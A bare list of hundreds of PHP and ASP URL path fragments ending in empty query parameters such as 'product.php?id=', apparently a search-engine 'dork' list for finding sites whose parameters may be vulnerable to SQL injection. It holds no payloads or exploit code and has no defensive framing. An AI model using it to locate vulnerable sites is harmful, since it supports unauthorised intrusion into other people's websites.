onlineshop/productView.php?rangeId=
more_details.php?id=
********.php?pid=
catalog/index.php?cPath=

page.php?id=
index.php?cPath=
article_full.php?id=
hearst_journalism/press_release.php?id=
dump.php?bd_id=
Category.php?cid=
products.php?cat=
store/products.php?cat_id=
product.php?cat_id=
v/showthread.php?t=
melbourne_details.php?id=
stdetail.php?prodID=
**********/fid17013034EFB2509745A39CD861F4FEA3E716FBE5.aspx?s=
print.php?sid=
press_release/release_detail.php?id=
shop/shop.php?id=
news/v.php?id=
education.php?id_cat=
store/store.php?cat_id=
forums/showthread.php?t=
news.php?id=
events/event-detail.cfm?intNewsEventsID=
article.php?id=
viewmedia.php?prmMID=
magdetail.php?magid=
cemetery.php?id=
index.php?id_cat=
shop/index.php?cPath=
view_songs.php?cat_id=
shop/products.php?p=
shop/index.php?cat_id=
tourism/details.php?id=
catalog/index.php?cPath=
ViewPodcast.php?id=
profile.php?objID=
item_show.php?itemID=
press_releases/press_releases.php?id=
print.php?sid=
gallery/categoria.php?id_cat=
obj/print.php?objId=
print.php?sid=
nuell/item_show.php?itemID=
products/products.php?p=
products/item_show.php?itemId=
view_ratings.php?cid=
press_releases.php?id=
main/content.php?id=
shop/index.php?cat_id=
book.html?isbn=
shop/products.php?cat_id=
kshop/home.php?cat=
section.php?section=
bearstore/store.php?cat_id=
page_prod.php?id_cat=
default.php?cPath=
news.php?category=
products/product.php?pid=
print.php?sid=
print.php?sid=
show_bug.cgi?id=
news.php?articleID=
search/index.php?q=
bookSingle.php?bookId=
weekly/story.php?story_id=
index.php?cPath=
catalog/index.php?cPath=
more_details.php?id=
press_release.php?id=
store/showcat.php?cat_id=
m/content/article.php?content_id=
article.php?id=
viewstore.php?cat_id=
shop.php?id_cat=
news/press-announcements/press_release.php?press_id=
publication/ontarget_details.php?oid=
product_details.php?prodID=
print.php?sid=
specials.php?osCsid=
category_view.php?category_id=
book_dete.php?bookID=
index.php?cPath=
events.php?pid=
articles/index.php?id=
category.php?cat_id=
html/products_cat.php?cat_id=
more_details.php?id=
preview.php?pid=
product.php?productid=
Product.php?Showproduct=
bbs/view.php?tbl=
news.php?id=
details/food.php?cid=
products.php?cat=
calendar/week.php?cid=
print.php?id=
itemlist.php?categoryID=
fshstatistic/index.php?&PID=
press_release/release_detail.php?id=
product.php?prod_num=
products.php?page=
con_product.php?prodid=
mp-prt.php?item=
notice/notice_****.php?id=
showproducts.php?cid=
site/?details&prodid=
downloads.php?file_id=
products.php?cat_id=
product.php?c=
campkc-today.php?Start=
index.php?page=
detail.php?id=
shop/product.php?id=
classifieds/showproduct.php?product=
product-details.php?prodID=
gallery/gallery.php?id=
adetail.php?id=
home.php?cat=
store/item.php?id=
products.php?cat=
detail.php?prodid=
links.php?cat=
detail.php?prodid=
videos/view.php?id=
resources/index.php?cat=
dream_interpretation.php?id=
category.php?category_id=
html/gallery.php?id=
item.php?id=
category.php?ID=
knowledge_base/detail.php?id=
home.php?cat=
gallery.php?id=
category.php?c=
index.php?area_id=
games/play.php?id=
tutorial.php?articleid=
directory/showcat.php?cat=
gallery/gallery.php?id=
news/newsitem.php?newsID=
site/public/newsitem.php?newsID=
index.php?cat=
newsitem.php?newsID=
category.php?catid=
gallery.php?id=
content.php?id=
resources/category.php?CatID=
media.php?****=
store/detail.php?prodid=
display_page.php?tpl=
calendar/item.php?id=
item-menu.php?idSubCat=
Blog/viewpost.php?id=
news/newsitem.php?newsID=
detail.php?prodid=
printarticle.php?id=
article.php?id=
category.php?id=
page.php?id=
detail.php?prodid=
links/resources/links_search_result.php?catid=
news_view.php?id=
item.php?id=
display_page.php?elementId=
photog.php?id=
home.php?cat=
categories.php?catid=
categories.php?parent_id=
index.php?product=
category.php?catId=
cm/public/news/news.php?newsid=
content.php?page=
volunteers/item.php?id=
ressource.php?ID=
extensions/extlist.php?cat=
category.php?id=
cms/publications.php?id=
page.php?id=
offer_info.php?id=
cart/detail_prod.php?id=
directory.php?cat=
Shop/home.php?cat=
categories.php?cat=
newsitem.php?newsid=
shareit/readreviews.php?cat=
categories.php?cat=
item.php?sub_id=
index.php?area_id=
category.php?catid=
item.php?sub_id=
index.php?area_id=
now_viewing.php?id=
categories.php?cat=
publications/?id=
carry-detail.php?prodID=
tools/tools_cat.php?c=
detail.php?prodid=
gallery/mailmanager/subscribe.php?ID=
painting.php?id=
Catalog_View_Summary.php?ID=
categories.php?parent_id=
product-detail.php?prodid=
newsitem.php?newsid=
liblog/index.php?cat=
cart/prod_subcat.php?id=
goto.php?area_id=
catalog.php?CAT=
showthread.php?t=
category.php?id=
item.php?item=
site/cat.php?setlang=
item.php?id=
videos/view.php?id=
item.php?SKU=
display_page.php?id=
index.php?id=
faq/category.php?id=
news/newsitem.php?newsid=
cat.php?cat=
review.php?id=
knowledgebase/article.php?id=
forums/showthread.php?t=
product_info.php?products_id=
cart/home.php?cat=
item.php?id=
board/viewtopic.php?id=
page.php?id=
english/gallery.php?id=
detail.php?prodid=
detail.php?prodid=
item.php?item_id=
article.php?ID=
categories.php?cat=
media.php?****=
home.php?cat=
gallery/gallery.php?id=
library.php?author=
item.php?cat=
cart/home.php?cat=
vb/showthread.php?p=
news-item.php?id=
ads/index.php?cat=
item.php?code=
kids-detail.php?prodID=
index.php?id=
category.php?id=
addsiteform.php?catid=
categories.php?cat=
newshop/category.php?c=
news/news-item.php?id=
product.php?proid=
catalog/product_info.php?products_id=
products.php?cat=
product.php?productid=
browsepr.php?pr=
products.php?cat=
productDetail.php?prodId=
productDetail.php?prodId=
product.php?products_id=
product.php?productid=
browsepr.php?pr=
product.php?ProductID=
product-details.php?prodId=
product_details.php?prodid=
product_info.php?products_id=
product.php?id=
browsepr.php?pr=
products.php?cat=
product_details.php?product_id=
products.php?cat=
product.php?proid=
productlist.php?tid=
products.php?cat=
product_details.php?product_id=
products/product.php?article=
products.php?cid=
forums/showthread.php?t=
show_prod.php?p=
new/showproduct.php?prodid=
product.php?productid=
prod.php?Cat=
productlist.php?fid=
product.php?pl=
product.php?proID=
product_details.php?product_id=
PCMA/productDetail.php?prodId=
product.php?proid=
panditonline/productlist.php?id=
productlist.php?id=
js_product_detail.php?pid=
prod.php?cat=
poem.php?id=
estore/products.php?cat=
summary.php?PID=
productdetails.php?prodId=
product-details.php?prodID=
en/product.php?proid=
product-list.php?ID=
main/product.php?productid=
product.php?product=
site/catalog.php?cid=
resources/index.php?cat=
SearchProduct/ListProduct.php?PClassify_3_SN=
Products/product.php?pid=
clear/store/products.php?product_category=
earth/visitwcm_view.php?id=
products.php?categoryID=
product.php?productid=
products/products.php?cat=
product.php?pid=
product.php?proid=
home.php?cat=
html/projdetail.php?id=
products/index.php?cat=
productDetails.php?prodId=
proddetail.php?prod=
product.php?productid=
products.php?subgroupid=
product_info.php?products_id=
prod.php?cat=
product_detail.php?prodid=
discont_productpg.php?product_id=
giftshop/product.php?proid=
products.php?cat=
product.php?product_id=
shop/products.php?cat=
product_info.php?products_id=
products.php?cat=
SearchProduct/ListProduct.php?PClassify_3_SN=
productlist.php?id=
products.php?cat=
product_customed.php?pid=
products.php?cat=
productlist.php?id=
product.php?id=
materials/item_detail.php?ProductID=
products/productdetails.php?prodID=
product_details.php?product_id=
products.php?cat=
projDetail.php?id=
main/product.php?productid=
product_details.php?product_id=
product.php?proid=
ProductDetails.php?ProdID=
store/product.php?productid=
x/product.php?productid=
product.php?productid=
product.php?id=
iam/tabbedWithShowcase.php?pid=
reviews/index.php?cat=
product.php?productid=
product.php?pid=
product.php?proid=
mhp/my***.php?hls=
xcart/product.php?productid=
products.php?cat=
xcart/product.php?productid=
productlist.php?id=
product_info.php?products_id=
productlist.php?cat=
prodrev.php?cat=
productlist.php?id=
projdetail.php?id=
store/customer/product.php?productid=
product.php?product_id=
product.php?productid=
products.php?cat=
cats_disp.php?cat=
product.php?product_id=
productdetails.php?prodid=
product_details.php?product_id=
product_details.php?product_id=
product.php?id=
productlist.php?tid=
ddoecom/product.php?proid=
proddetail.php?prod=
productlist.php?fid=
products.php?cat=
Products/Catsub.php?recordID=
Products/mfr.php?mfg=
site/catalog.php?pid=
shop/product_details.php?ProdID=
usar/productDetail.php?prodID=
products/display_product.php?product_id=
products.php?cat=
cardIssuance/product.php?pid=
product.php?proid=
products.php?parent=
products.php?catId=
productDetail.php?prodID=
productlist.php?fid=
products.php?mainID=
products.php?cat=
product_info.php?products_id=
product_detail.php?prodid=
catalog/product_info.php?products_id=
product_info.php?products_id=
products.php?cat=
product.search.php?proid=
productlist.php?id=
product.php?proid=
product.php?pid=
product_reviews.php?feature_id=
product.php?product_id=
product.php?productid=
item.php?id=
directorylisting.php?cat=
historical/stock.php?symbol=
viewtopic.php?pid=
cc/showthread.php?t=
category/index_pages.php?category_id=
files.php?cat=
vb/showthread.php?t=
newsitem.php?newsid=
categories.php?parent_id=
products.php?cat=
kshop/home.php?cat=
publications/publication.php?id=
category.php?Category_ID=
item.php?ID=
category.php?catID=
print.php?id=
Range.php?rangeID=
en/mobile_phone.php?ProdID=
news-item.php?newsID=
newsitem.php?newsID=
newsitem.php?newsID=
newsitem.php?newsID=
category.php?id_category=
en/procurement/news-item.php?newsID=
newsitem.php?newsID=
product-list.php?id=
pages/product.php?product_id=
bug.php?id=
showthread.php?p=
photo_view.php?id=
index.php?option=
event/detail.php?id=
fatcat/artistInfo.php?id=
viewtopic.php?id=
showthread.php?t=
index.php?showtopic=
news.php?id=
news.php?id=
news/index.php?ID=
article.php?id=
h4kurd/showthread.php?tid=
faq/question.php?Id=
forums/index.php?topic=
rss.php?id=
tak/index.php?module=
stafflist/profile.php?id=
manual.php?product=
events/event.php?id=
index.php?id=
detail.php?id=
detail.php?id=
show.php?id=
contentok.php?id=
event_details.php?id=
socsci/events/full_details.php?id=
index.php?id=
etemplate.php?id=
index.php?id=
anj.php?id=
anj.php?id=
forum/viewtopic.php?t=
profile.php?id=
pubs_more2.php?id=
content.php?id=
opportunities/bursary.php?id=
opportunities/event.php?id=
vb/showthread.php?p=
events_more.php?id=
product_detail.cfm?id=
events/index.php?id=
articles.php?id=
index.php?id=
package_info.php?id=
news_more.php?id=
productinfo.php?id=
pageType2.php?id=
news.php?id=
news.php?id=
artform.cfm?id=
article.php?id=
product.php?id=
index.php?id=
event_details.php?id=
productDetails.php?id=
faq.php?id=
?id=
gig.php?id=
showthread.php?t=
faq.php?q_id=
events.php?pid=
profiles/profile.php?profileid=
ProductDetails.php?id=
about.php?id=
news-story.php?id=
index.php?id=
display-sunsign.php?id=
news.php?id=
product_page.php?id=
news/news_detail.php?id=
yarndetail.php?id=
airactivity.cfm?id=
earthactivity.cfm?id=
index.php?id=
news.php?id=
Doncaster/events/event.php?ID=
index.php?id=
index.php?id=
user/AboutAwardsDetail.php?ID=
hw_reviews.php?id=
page.php?area_id=
view_company.php?id=

site/marketing_article.php?id=
articles.php?id=
release.php?id=
news.php?display=
index.php?id=
current/diary/story.php?id=
meetings/presentations.php?id=
product.php?fdProductId=
featuredetail.php?id=
featuredetail.php?id=
news.php?id=
shopping/index.php?id=
feature.php?id=
Links/browse.php?id=
Links/browse.php?id=
issue.php?id=
index.php?id=
product_details.php?id=
article.php?id=
index.php?id=
product.php?brand=
productpage.php?ID=
newsite/events.php?id=
show_upload.php?id=
display_user.php?ID=
productinfo.php?id=
index.php?id=
news/details.php?id=
contact_details.php?id=
news.php?id=
news.php?id=
news.php?id=
viewevent.php?id=
news.php?id=
news.php?id=
events/events.php?id=
news/news.php?id=
news/news.php?id=
modsdetail.php?id=
fitxa.php?id=
contact.php?id=
latestnews.php?id=
mylink.php?id=
products_detail.php?id=
products_detail.php?id=
products_detail.php?id=
faq.php?****=
FaqDetail.php?ID=
content.php?id=
profile.php?id=
profile.php?id=
art_page.php?id=
brand.php?id=
section.php?id=
product2.php?id=
product3.php?id=
members/profile.php?id=
?id=
profile.php?id=
info.php?id=
general/blogpost/?p=
event.php?id=
index.php?id=
faq.php?id=
artist.php?id=
artist.php?id=
product_info.php?products_id=
article.php?id=
list_trust.php?id=
members/member-profile.php?id=
article.php?id=
productview.php?id=
news-full.php?id=
profile.php?id=
product.php?fdProductId=
content.php?id=
product.php?inid=
event.php?id=
review.php?id=
newsDetails.php?ID=
products.php?id=
template.php?ID=
index.php?id=
sectionpage.php?id=
event.php?id=
directory/profile.php?id=
about.php?id=
queries/lostquotes/?id=
products/model.php?id=
products/model.php?id=
product.php?id=
index.php?id=
event.php?id=
news.php?id=
animal/products.php?id=
mp.php?id=
policy.php?id=
faq.php?id=
profile.php?id=
events/detail.php?ID=
news/detail.php?ID=
product-info.php?cat=
product-info.php?cat=
index.php?id=
press_cutting.php?id=
frf10/news.php?id=
frf10/news.php?id=
shopping.php?id=
trainers.php?id=
index.php?id=
news/article.php?id=
index.php?id=
view-event.php?id=
article.php?id=
index.php?id=
games/index.php?task=
index.php?id=
products/testimony.php?id=
events/index.php?ID=
story.php?id=
****index/productinfo.php?id=
games/play.php?id=
corporate/faqs/faq.php?Id=
users/view.php?id=
developments_detail.php?id=
article.php?id=
profile/detail.php?id=
profile/detail.php?id=
superlinks/browse.php?id=
player.php?id=
index.php?id=
index.php?Id=
events.php?id=
index.php?id=
index.php?id=
profile/newsdetail.php?id=
links/browse.php?id=
item.php?id=
public_individual_sponsorship.php?ID=
contact-us?reportCompany=
index.php?id=
shopping_article.php?id=
news.php?id=
cd.php?id=
download_free.php?id=
download_free.php?id=
artist.php?id=
download_details.php?id=
used/cardetails.php?id=
customer/product.php?productid=
pressroom/viewnews.php?id=
fatcat/artistInfo.php?id=
worklog/task.php?id=
viewtopic.php?id=
showthread.php?t=
order/cart/index.php?maincat_id=
Featured_Site.php?id=
index.php?option=
prod_details.php?id=
showthread.php?tid=
h4kurd/showthread.php?tid=
h4kurd/showthread.php?tid=
index.php?coment=
store.php?id=
what***elieveb.php?id=
View.php?view=
rss.php?id=
details.php?id=
product.php?id=
villa_detail.php?id=
en/produit.php?id=
?act=
index.php?act=
detail.php?id=
index.php?showtopic=
cc/showthread.php?p=
cardetails.php?id=
contentok.php?id=
event_details.php?id=
camp_details.php?id=
html/101_artistInfo.php?id=
jump.php?id=
index.php?id=
company_details.php?ID=
finalrevdisplay.php?id=
speed-dating/booking.php?id=
page2.php?id=
html/products.php?id=
pubs_more2.php?id=
events/event.php?id=
opportunities/bursary.php?id=
projects/project.php?id=
venue-details.php?id=
store/mcart.php?ID=
index.php?id=
index.php?id=
details.php?id=
blpage.php?id=
news/articleRead.php?id=
pageType1.php?id=
products.php?area_id=
memprofile.php?id=
scripts/comments.php?id=
index.php?page=
press/press.php?id=
retail/index_bobby.php?id=
home.php?id=
campaigns.php?id=
merchandise.php?id=
details.php?id=
cardetails.php?id=
article.php?id=
auction_details.php?auction_id=
abouttheregions_province.php?id=
abouttheregions_village.php?id=
index.php?id=
product.php?id=
specials/Specials_Pick.php?id=
productDetails.php?id=
showPage.php?type=
booking.php?id=
subcategory-page.php?id=
specials.php?id=
company/news.php?id=
gig.php?id=
brief.php?id=
store/store_detail.php?id=
ProductDetails.php?id=
articles/index.php?id=
about.php?id=
viewproduct.php?id=
carsdetail.php?id=
index.php?id=
index.php?id=
news/news_detail.php?id=
product_guide/company_detail.php?id=
show_news.php?id=
forum/viewtopic.php?id=
product.php?id=
specials.php?id=
specials.php?id=
subcategory.php?id=
product.php?id=
index.php?id=
signed-details.php?id=
library/article.php?ID=
mpacms/dc/article.php?id=
viewproduct.php?prod=
product_detail.php?id=
view_company.php?id=
view.php?id=
articles.php?id=
release.php?id=
release.php?id=
book-details.php?id=
shopping/index.php?id=
cms/story.php?id=
product_details.php?id=
product.php?id=
dataaccess/article.php?ID=
showthread.php?p=
auction_details.php?auction_id=
show_upload.php?id=
store-detail.php?ID=
index.php?page=
view.php?user_id=
product.php?id=
index.php?mwa=
index.php?id=
site/view8b.php?id=
pages/events/specificevent.php?id=
contact_details.php?id=
static.php?id=
products/category.php?id=
member.php?ctype=
projects/pview.php?id=
section.php?parent=
link_exchange/browse.php?id=
gallery.php?id=
song.php?ID=
viewproduct.php?id=
news_detail.php?ID=
entertainment/listings.php?id=
entertainment/listings.php?id=
news/news.php?id=

sport/sport.php?id=
details.php?id=
categories.php?id=
franchise2.php?id=
ad.php?id=
latestnews.php?id=
mylink.php?id=
products_detail.php?id=
products_detail.php?id=
product.php?id=
articles/details.php?id=
view.php?id=
chamber/members.php?id=
oracle/ifaqmaker.php?id=
carinfo.php?id=
addpages.php?id=
addpages.php?id=
detail.php?id=
cardetail.php?id=
article.php?id=
members/profile.php?id=
prod_indiv.php?groupid=
journal.php?id=
sup.php?id=
business/details.php?id=
tales.php?id=
artist.php?id=
mens/product.php?id=
news/news.php?id=
joke-display.php?id=
members/item.php?id=
store.php?id=
viewprofile.php?id=
restaurant.php?id=
details.php?id=
product.php?id=
trailer_detail.php?id=
product.php?id=
product.php?id=
product.php?id=
specials/nationvdo/showvdo.php?cateid=
specials/nationvdo/showvdo.php?cateid=
product.php?id=
secondary.php?id=
category.php?id=
showthread.php?tid=
02/forum_topic.php?id=
history/index.php?id=
njm/cntpdf.php?t=
htmlpage.php?id=
details.php?id=
car_details.php?id=
review.php?id=
members.php?id=
show_cv.php?id=
melbourne.php?id=
melbourne_details.php?id=
products.php?id=
member-details.php?id=
custompages.php?id=
workshopview.php?id=
forums/index.php?topic=
free-release.php?id=
holidays/dest/offers/offers.php?id=
viewproducts.php?id=
article.php?id=
ViewPodcast.php?id=
pubs-details.php?id=
product_guide/company_detail.php?id=
viewproduct.php?id=
site.php?id=
mp.php?id=
usb/devices/showdev.php?id=
cuisine/index.php?id=
tour.php?id=
article.php?id=
product_info.php?products_id=
book2.php?id=
subcategory.php?id=
checknews.php?id=
courses/course.php?id=
promotion.php?id=
index.php?op=
news/viewarticle.php?id=
blog/?p=
categories.php?id=
projects/detail.php?id=
articles.php?id=
vb/showthread.php?p=
products/product.php?id=
soe_sign_action.php?id=
template1.php?id=
trackback.php?id=
architect_full.php?id=
story.php?id=
films.php?id=
details.php?page=
GT5/car-details.php?id=
chalets.php?id=
product.php?id=
details.php?id=
shopping.php?id=
ss.php?id=
feature2.php?id=
media_display.php?id=
products.php?id=
car.php?id=
courses/course-details.php?id=
content.php?dtid=
developments_view.php?id=
index.php?id=
product.php?par=
tekken5/movelist.php?id=
news-details.php?id=
comedy_to_go.php?id=
jobs.php?id=
article/article.php?id=
story.php?id=
trade/listings.php?Id=
eventdetails.php?id=
news/show.php?id=
superleague/news_item.php?id=
view_article.php?id=
product.php?productid=
news/articleRead.php?id=
trvltime.php?id=
store/item.php?id=
index.php?id=
articles/article.php?id=
cc/showthread.php?t=
showthread.php?t=
events_details.php?id=
links/browse.php?id=
item.php?id=
public_individual_sponsorship.php?ID=
booking.php?s=
projects/view.php?id=
Company%20Info.php?id=
view_article.php?id=
media.php?id=
review.php?id=
shopping_article.php?id=
cd.php?id=
index.php?p=
canal/imap.php?id=
display.php?id=
bug.php?id=
showthread.php?p=
booking/bandinfo.php?id=
store/store_detail.php?id=
details.php?id=
details.php?id=
index.php?ID=
prod_details.php?id=
********.php?id=
rss.php?id=
solutions/item.php?id=
en/produit.php?id=
item/wpa-storefront-the-ultimate-wpecommerce-theme/discussion/61891?page=
showthread.php?t=
index.php?showtopic=
contentok.php?id=
liverpool/details.php?id=
products/product.asp?ID=
includes/top-ten/display_review.php?id=
article.php?id=
store/item.php?id=
forumapc/plantfinder/details.php?id=
ARDetail.asp?ID=
store/mcart.php?ID=
shop.asp?id=
index.php?id=
detailed_product.asp?id=
detailed_product.asp?id=
company.asp?ID=
newsletter/newsletter.php?id=
details.php?id=
details.php?id=
boat_plans.asp?id=
prod_show.asp?prodid=
prod_show.asp?id=
fonts/details.php?id=
articles.php?id=
tourdetail.php?id=
program/details.php?ID=
abouttheregions_province.php?id=
abouttheregions_village.php?id=
Search_Data_Sheet.asp?ID=
indepth/details.php?id=
page.php?id=
article.php?id=
booking/bandinfo.php?id=
store/store_detail.php?id=
articles/index.php?id=
event.php?id=
cat.asp?id=
store/news_story.php?id=
ddoecom/index.php?id=
product.asp?id=
shop/shop.php?id=
ArtistDetail.php?id=
invent/details.php?id=
page.php?id=
eventtype.php?id=
c_page.php?id=
cms/story.php?id=
downloads.asp?software=
737en.php?id=
events/event.php?id=
auction_details.php?auction_id=
store-detail.php?ID=
details.php?id=
index.php?id=
article.php?id=
news_detail.asp?id=
projects/pview.php?id=
report-detail.asp?id=
article/index.php?id=
store.php?id=
artists/story/index.php?id=
franchise2.php?id=
article.php?id=
rentals.php?id=
worthies/details.php?id=
artists/index.php?id=
mylink.php?id=
resource.php?id=
category_id.php?id=
products.asp?ID=
detail.php?id=
lakeinfo.php?id=
business/details.php?id=
news/details.php?id=
list.php?id=
en/visit.php?id=
product_details.asp?id=
store.php?id=
viewprofile.php?id=
lowell/restaurants.php?id=
en/details.php?id=
en/details.php?id=
rca/store/item.php?item=
Steamboat_Springs_Vacation_Rental.php?ID=
where/details.php?id=
htmlpage.php?id=
details.php?id=
details.php?id=
melbourne.php?id=
melbourne_details.php?id=
products.php?ID=
Stacks/storyprof.php?ID=
artists.php?id=
board/showthread.php?t=
workshopview.php?id=
workshopview.php?id=
artists/details.php?id=
displayArticle.php?id=
event.php?id=
services_details_description.php?id=
product.asp?id=
WhitsundaySailing.php?id=
nl/default.asp?id=
directory/listing_coupons.php?id=
exhibitions/details.php?id=
details.php?id=
page.php?id=
cheats/details.php?ID=
media_display.php?id=
********.php?id=
articles.php?id=
index.php?id=
video.php?id=
news-details.php?id=
details.php?id=
press2.php?ID=
products/treedirectory.asp?id=
events/details.php?id=
calendar/event.php?id=
page.php?id=
ficha.php?id=
links/browse.php?id=
wwdsemea/default.asp?ID=
forum/showthread.php?t=
media.php?id=
review.php?id=
store/item.php?id=

asp
ßæÏ:

about.asp?cartID=
accinfo.asp?cartId=
acclogin.asp?cartID=
add.asp?bookid=
add_cart.asp?num=
addcart.asp?
addItem.asp
add-to-cart.asp?ID=
addToCart.asp?idProduct=
addtomylist.asp?ProdId=
adminEditProductFields.asp?intProdID=
advSearch_h.asp?idCategory=
affiliate.asp?ID=
affiliate-agreement.cfm?storeid=
affiliates.asp?id=
ancillary.asp?ID=
archive.asp?id=
article.asp?id=
aspx?PageID
basket.asp?id=
Book.asp?bookID=
book_list.asp?bookid=
book_view.asp?bookid=
BookDetails.asp?ID=
browse.asp?catid=
browse_item_details.asp
Browse_Item_Details.asp?Store_Id=
buy.asp?
buy.asp?bookid=
bycategory.asp?id=
cardinfo.asp?card=
cart.asp?action=
cart.asp?cart_id=
cart.asp?id=
cart_additem.asp?id=
cart_validate.asp?id=
cartadd.asp?id=
cat.asp?iCat=
catalog.asp
catalog.asp?CatalogID=
catalog_item.asp?ID=
catalog_main.asp?catid=
category.asp
category.asp?catid=
category_list.asp?id=
categorydisplay.asp?catid=
checkout.asp?cartid=
checkout.asp?UserID=
checkout_confirmed.asp?order_id=
checkout1.asp?cartid=
comersus_listCategoriesAndProducts.asp?idCategory=
comersus_optEmailToFriendForm.asp?idProduct=
comersus_optReviewReadExec.asp?idProduct=
comersus_viewItem.asp?idProduct=
comments_form.asp?ID=
contact.asp?cartId=
content.asp?id=
customerService.asp?****ID1=
default.asp?catID=
description.asp?bookid=
details.asp?BookID=
details.asp?Press_Release_ID=
details.asp?Product_ID=
details.asp?Service_ID=
display_item.asp?id=
displayproducts.asp
downloadTrial.asp?intProdID=
emailproduct.asp?itemid=
emailToFriend.asp?idProduct=
events.asp?ID=
faq.asp?cartID=
faq_list.asp?id=
faqs.asp?id=
feedback.asp?title=
freedownload.asp?bookid=
fullDisplay.asp?item=
getbook.asp?bookid=
GetItems.asp?itemid=
giftDetail.asp?id=
help.asp?CartId=
home.asp?id=
index.asp?cart=
index.asp?cartID=
index.asp?ID=
info.asp?ID=
item.asp?eid=
item.asp?item_id=
item.asp?itemid=
item.asp?model=
item.asp?prodtype=
item.asp?shopcd=
item_details.asp?catid=
item_list.asp?maingroup
item_show.asp?code_no=
itemDesc.asp?CartId=
itemdetail.asp?item=
itemdetails.asp?catalogid=
learnmore.asp?cartID=
links.asp?catid=
list.asp?bookid=
List.asp?CatID=

listcategoriesandproducts.asp?idCategory=
modline.asp?id=
myaccount.asp?catid=
news.asp?id=
order.asp?BookID=
order.asp?id=
order.asp?item_ID=
OrderForm.asp?Cart=
page.asp?PartID=
payment.asp?CartID=
pdetail.asp?item_id=
powersearch.asp?CartId=
price.asp
privacy.asp?cartID=
prodbycat.asp?intCatalogID=
prodetails.asp?prodid=
prodlist.asp?catid=
product.asp?bookID=
product.asp?intProdID=
product_info.asp?item_id=
productDetails.asp?idProduct=
productDisplay.asp
productinfo.asp?item=
productlist.asp?ViewType=Category&CategoryID=
productpage.asp
products.asp?ID=
products.asp?keyword=
products_category.asp?CategoryID=
products_detail.asp?CategoryID=
productsByCategory.asp?intCatalogID=
prodView.asp?idProduct=
promo.asp?id=
promotion.asp?catid=
pview.asp?Item=
resellers.asp?idCategory=
results.asp?cat=
savecart.asp?CartId=
search.asp?CartID=
searchcat.asp?search_id=
Select_Item.asp?id=
Services.asp?ID=
shippinginfo.asp?CartId=
shop.asp?a=
shop.asp?action=
shop.asp?bookid=
shop.asp?cartID=
shop_details.asp?prodid=
shopaddtocart.asp
shopaddtocart.asp?catalogid=
shopbasket.asp?bookid=
shopbycategory.asp?catid=
shopcart.asp?title=
shopcreatorder.asp
shopcurrency.asp?cid=
shopdc.asp?bookid=
shopdisplaycategories.asp
shopdisplayproduct.asp?catalogid=
shopdisplayproducts.asp
shopexd.asp
shopexd.asp?catalogid=
shopping_basket.asp?cartID=
shopprojectlogin.asp
shopquery.asp?catalogid=
shopremoveitem.asp?cartid=
shopreviewadd.asp?id=
shopreviewlist.asp?id=
ShopSearch.asp?CategoryID=
shoptellafriend.asp?id=
shopthanks.asp
shopwelcome.asp?title=
show_item.asp?id=
show_item_details.asp?item_id=
showbook.asp?bookid=
showStore.asp?catID=
shprodde.asp?SKU=
specials.asp?id=
store.asp?id=
store_bycat.asp?id=
store_listing.asp?id=
Store_ViewProducts.asp?Cat=
store-details.asp?id=
storefront.asp?id=
storefronts.asp?title=
storeitem.asp?item=
StoreRedirect.asp?ID=
subcategories.asp?id=
tek9.asp?
template.asp?Action=Item&pid=
topic.asp?ID=
tuangou.asp?bookid=
type.asp?iType=
updatebasket.asp?bookid=
updates.asp?ID=
view.asp?cid=
view_cart.asp?title=
view_detail.asp?ID=
viewcart.asp?CartId=
viewCart.asp?userID=
viewCat_h.asp?idCategory=
viewevent.asp?EventID=
viewitem.asp?recor=
viewPrd.asp?idcategory=
ViewProduct.asp?misc=
voteList.asp?item_ID=
whatsnew.asp?idCategory=
WsAncillary.asp?ID=
WsPages.asp?ID=noticiasDetalle.asp?xid=
sitio/item.asp?idcd=
index.asp?site=
de/content.asp?page_id=
gallerysort.asp?iid=
products.asp?type=
event.asp?id=
showfeature.asp?id=
home.asp?ID=
tas/event.asp?id=
profile.asp?id=
details.asp?id=
past-event.asp?id=
index.asp?action=
site/products.asp?prodid=
page.asp?pId=
resources/vulnerabilities_list.asp?id=
site.asp?id=
products/index.asp?rangeid=
global_projects.asp?cid=
publications/view.asp?id=
display_page.asp?id=
pages.asp?ID=
lmsrecords_cd.asp?cdid=
product.asp?prd=
cat/?catid=
products/product-list.asp?id=
debate-detail.asp?id=
cbmer/congres/page.asp?LAN=
content.asp?id=
news.asp?ID=
photogallery.asp?id=
index.asp?id=
product/product.asp?product_no=
nyheder.htm?show=
book.asp?ID=
print.asp?id=
detail.asp?id=
book.asp?id=
content.asp?PID=
more_detail.asp?id=
content.asp?id=
view_items.asp?id=
view_author.asp?id=
main.asp?id=
english/fonction/print.asp?id=
magazines/adult_magazine_single_page.asp?magid=
product_details.asp?prodid=
magazines/adult_magazine_full_year.asp?magid=
products/card.asp?prodID=
catalog/product.asp?cat_id=
e_board/modifyform.html?code=
community/calendar-event-fr.asp?id=
products.asp?p=
news.asp?id=
view/7/9628/1.html?reply=
product_details.asp?prodid=
catalog/product.asp?pid=
rating.asp?id=
?page=
catalog/main.asp?cat_id=
index.asp?page=
detail.asp?prodid=
products/product.asp?pid=
news.asp?id=
book_detail.asp?BookID=
catalog/main.asp?cat_id=
catalog/main.asp?cat_id=
default.asp?cPath=
catalog/main.asp?cat_id=
catalog/main.asp?cat_id=
category.asp?catid=
categories.asp?cat=
categories.asp?cat=
detail.asp?prodID=
detail.asp?id=
category.asp?id=
hm/inside.asp?id=
index.asp?area_id=
gallery.asp?id=
products.asp?cat=
products.asp?cat=
media/pr.asp?id=
books/book.asp?proj_nr=
products/card.asp?prodID=
general.asp?id=
news.asp?t=
usb/devices/showdev.asp?id=
content/detail.asp?id=
templet.asp?acticle_id=
news/news/title_show.asp?id=
product.asp?id=
index.asp?url=
cryolab/content.asp?cid=
ls.asp?id=
s.asp?w=
abroad/page.asp?cid=
bayer/dtnews.asp?id=
news/temp.asp?id=
index.asp?url=
book/bookcover.asp?bookid=
index.asp/en/component/pvm/?view=
product/list.asp?pid=
cats.asp?cat=
software_categories.asp?cat_id=
print.asp?sid=
docDetail.aspx?chnum=
index.asp?section=
index.asp?page=
index.asp?page=
en/publications.asp?id=
events/detail.asp?ID=
forum/profile.asp?id=
media/pr.asp?id=
content.asp?ID=
cloudbank/detail.asp?ID=
pages.asp?id=
news.asp?id=
beitrag_D.asp?id=
content/index.asp?id=
index.asp?i=
?action=
index.asp?page=
beitrag_F.asp?id=
index.asp?pageid=
page.asp?modul=
detail.asp?id=
index.asp?w=
index.asp?modus=
news.asp?id=
news.asp?id=
aktuelles/meldungen-detail.asp?id=
item.asp?id=
obio/detail.asp?id=
page/de/produkte/produkte.asp?prodID=
